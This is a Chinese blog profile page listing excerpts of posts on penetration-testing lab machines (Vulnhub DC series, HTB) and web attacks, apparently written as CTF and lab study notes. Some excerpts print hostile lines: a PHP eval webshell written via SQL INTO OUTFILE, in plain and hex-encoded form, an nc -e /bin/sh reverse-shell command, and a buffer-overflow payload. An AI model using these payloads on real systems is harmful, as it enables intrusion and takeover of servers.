自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(22)
  • 收藏
  • 关注

原创 渗透测试靶机vulnhub_five86:1

靶机下载地址:five86:1首先扫描端口nmap 192.168.49.137 -sS -sV -p- -T5 -A发现只开了80端口访问 发现一个cms opennetadmin搜索该cms是否有直接可利用的exp,果然存在反弹回一个webshell搜集linux系统信息,检查一下内核版本,没有内核提权漏洞在后台配置文件找到数据库密码用one_password 爆...

2020-03-31 23:43:36 381 2

原创 vulnstack1

去到win7虚拟机,打开phpstudy拿webshellnmap扫描一下(3389是我后面打开的,前面扫不到的)访问80端口,直接跳到phpstudy探针获取到了系统路径和系统版本dirb扫描目录发现了phpmyadmin弱密码root:root 直接进了phpmyadmin后台关于phpmyadmin_getshell见我另一篇博客phpmyadmin_getshell...

2020-03-27 11:50:24 2011

原创 phpmyadmin_getshell

1. select xx into outfile xxselect '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php'; 如果括号被过滤就用十六进制select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into...

2020-03-27 11:01:39 702

原创 XSS原理+DOMXSS实战

1. XSS成因用户在客户端输入一个内容,服务端收到这个内容,并把它嵌入网页再返回给用户,这是一个常见的功能。如果用户输入的这个内容是一段精心构造的js代码,服务端恰好没有过滤,那返回的js就会被浏览器执行。2. XSS分类2.1 反射型 常见把js构造在URL中,然后引导其他人点击这个恶意URL,造成反射型XSS2.2 存储型 把恶意的js发送到服务端并存储,以后其他用户每次浏览页...

2020-03-22 20:03:24 1443

原创 常用windows cmd dos命令

重定向1> 正确输出2> 错误输出>> 追加\> 覆盖基本命令dir ==lscls ==clear 清空屏幕type ==cat文件创建文件1. echo2. copy con 文件名内容ctrl+z del 删除文件 /q 不再询问目录md 创建目录rd move directory 删除空文件夹rd /s 删除非...

2020-03-22 13:57:09 217

原创 windows sethc漏洞 5次shift获取系统权限

漏洞成因在未登陆的情况下,可以按下五次shift键启动 sethc程序,同时系统可以在未登录的情况下用system权限打开一个记事本,用记事本打开文件夹,可以将sethc程序换成cmd,进而获取了system权限复现过程在win7的启动过程中断电再次启动进入恢复界面选择修复在结果的中可以打开一个记事本用记事本打开 C:\windows\system找到sethc重命名,然后把...

2020-03-22 13:00:31 1045

原创 nmap扫描端口常用的几种扫描模式

TCP/IP中端口建立连接的原则在TCP/IP协议中,TCP协议提供可靠连接,采用三次握手建立连接,四次挥手断开连接。三次握手client发送SNY,请求建立连接server收到SNY,发送ACK确认,同时自己也发送一个SNY,即ACK+SYNclient收到ACK+SYN,回复ACK,连接建立完成。四次挥手client发送FIN,请求释放连接server收到FIN,发送A...

2020-03-19 16:34:52 6019

原创 20台靶机小结(vulnhub和HTB)

稀里糊涂就做了20台靶机了,从一开始的小白到现在稍微有一点感觉,觉得自己进步了一点,总的来说还是很菜。由于基础差,对linux和windows机制不太熟悉,很多靶机都是照着师傅们的wp做出来的,记录其中的一些脑洞和操作,一、信息收集1.在整个渗透过程中,收集到的账号密码全部保存为user.txt和pass.txt,遇到有需要账号认证的地方(ssh、后台、数据库、FTP等等)就爆破一下,说不定拿...

2020-02-14 22:53:45 722

原创 XCTF pwn level2

使用ida打开发现buf只有0x88,但是读取了0x100,存在溢出点然后存在system函数和字符/bin/sh有一点不太懂,选的是_system的地址,而不是system的地址,看了师傅的wp好像是这题的system函数申明了一个外部近指针,没有内容,不太明白然后就是构造payloadpayload=“a”*(0x88+0x4)+p32(sys_addr)+p32(0)+p32...

2020-02-03 14:31:15 410

原创 root-me networking writeup

1.FTP - authentication追踪流TCP直接查看明文2.TELNET - authentication追踪流TCP 明文3.ETHERNET - frame先hex解码,再base64解码

2020-02-02 13:09:22 355

原创 HTB Devel Metasploit msf提权windows机器入门姿势

在HTB中Devel算是入门级的简单机器,但是平时Linux的机器做得比较多windows的机器基本没接触过,做一下Devel也算是练习一下windows机器。在这个靶机中,传马的方式是FTP匿名登录,上传了一个webshell,在实际环境中,上传webshell的方法多种多样,但是后面提权的手段以及msf的操作可以借鉴nmap -sS -sV -A -T4 10.10.10.5从nmap...

2020-01-22 23:54:37 316

原创 vulnhub渗透测试靶机prime-1

靶机下载地址https://www.vulnhub.com/entry/prime-1,358/nmap -sS -sV -p- -T5发现只开了22和80那就从80入手吧浏览器访问 主页除了一张图片啥都没有dirb扫描目录发现了/wordpress目录和一些其他的页面其中的image.php,secret.txt都不是默认字典有的,问了几个师傅,说做多了就有经验了,关键字典要自己...

2020-01-19 13:32:49 1225

原创 vulnhub渗透测试靶机DC-8

靶机下载: https://www.vulnhub.com/entry/dc-8,367/环境:kali:192.168.49.129靶机:192.168.49.12先arp扫描一下目标靶机的ip地址发现192.168.49.12nmap流程走一下nmap 192.168.49.12 -p- -sV -sT -T5 -A只开放了22和80浏览器打开,发现是一个用Drupal搭...

2020-01-19 11:01:43 807

原创 vulnhub渗透测试靶机DC-7

下载地址:https://www.vulnhub.com/entry/dc-7,356/nmap -sT -sV -p- -T5 192.168.49.21我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter果然我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码dc7u...

2020-01-19 10:53:08 502

原创 vulnhub渗透测试靶机DC-6

靶机地址:https://www.vulnhub.com/entry/dc-6,315/nmap –sS –sV –p- -T5dirb跑一下,全是wp的目录上wpscan改一下hosts加一条 192.168.49.20 wordy没有发现漏洞 发现几个用户逐一爆破吧开开心心爆了半个小时,进度0.1%,这么多用户感觉爆破思路不会错,看了一眼师傅的wp,原来作者在vulnhu...

2020-01-19 10:47:19 533

原创 Vulnhub渗透测试靶机DC-5

靶机下载地址:https://www.vulnhub.com/entry/dc-5,314/nmap –sS –sV –p- -T5 192.168.49.19dirb 跑一下目录都是常规页面但是这个footer.php每次访问都不一样碰巧发现thankyou.php每次访问也不一样此处应该存在一个文件包含,把footer.php包含了进来我们用wfuzz模糊测试一下,找到...

2020-01-19 10:39:12 612

原创 Vulnhub渗透测试靶机DC-4

下载地址:https://www.vulnhub.com/entry/dc-4,313/nmap没有扫描到什么有用端口直接访问80端口只有一个认证框 没有验证 bp爆破admin弱密码发现密码admin qwert进入后台 发现有执行命令的地方抓包发现命令由post包传过去执行的命令由客户端传到了服务端命令执行获取shell把nc -e /bin/sh 192.168.49...

2020-01-19 10:32:17 492

原创 从安装Redis练习常规姿势 到HTB实战 postman userflag

实验环境centOS:192.168.49.16Kali:192.168.49.129安装安装过程参考https://blog.csdn.net/buyueliuying/article/details/82316517centOS7:wget http://download.redis.io/releases/redis-4.0.11.tar.gztar -xavf redis-4...

2020-01-13 15:52:57 625

原创 vulnhub渗透测试靶机DC-3

靶机下载:https://www.vulnhub.com/entry/dc-3,312/nmap 扫描只有一个80端口直接访问 没有过多提示用dirb跑发现了后台登录页面是一个joomld搭的开源站没有验证码 尝试爆破管理员密码bp发现是snoopy进入后台 找到template页面编辑一个php文件提醒:此处用的是冰蝎shell。msf的shell无法连上,system(...

2020-01-11 17:48:15 844 1

原创 vulnhub渗透测试靶机DC-9

靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/首先nmap扫描一下nmap 192.168.49.26 -sT -sV -p- -T5 -A直接进入80端口,发现一个search框,可以查询用户信息,与数据库有交互直接跑sqlmap,果然发现了漏洞脱裤吧这里发现了网站后台的admin以及密码 在线MD5解一下admin: tran...

2020-01-09 22:19:24 4024

原创 渗透测试靶机 MMMystery-DC2

DC-2Author:MMMystery靶机下载:vulnhub-DC2nmap扫描直接进入80端口 作者给出的提示 让我们使用cewl然后网站上有很多乱码的字母 应该是密码了cewl是一个密码攻击工具,能够爬取网页上的所有单词生成一个列表cewl http://dc-2 -w dc2.txt网站是WordPress搭建的wpscan扫描第一波没有可以用漏洞 那就枚举用户...

2020-01-01 21:47:28 436

原创 渗透测试靶机 MMMystery-DC1

DC-1Author:MMMystery靶机下载: vulnhub-DC1nmap -sT -sV -p- -T5 x.x.x.x发现22和80端口浏览器访问80端口,发现Drupal框架搜索漏洞尝试利用use 4set rhost x.x.x.xrun 然后就进入了meterpreter再输入python -c "import pty;pty.spawn('/bin...

2020-01-01 20:58:05 236

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除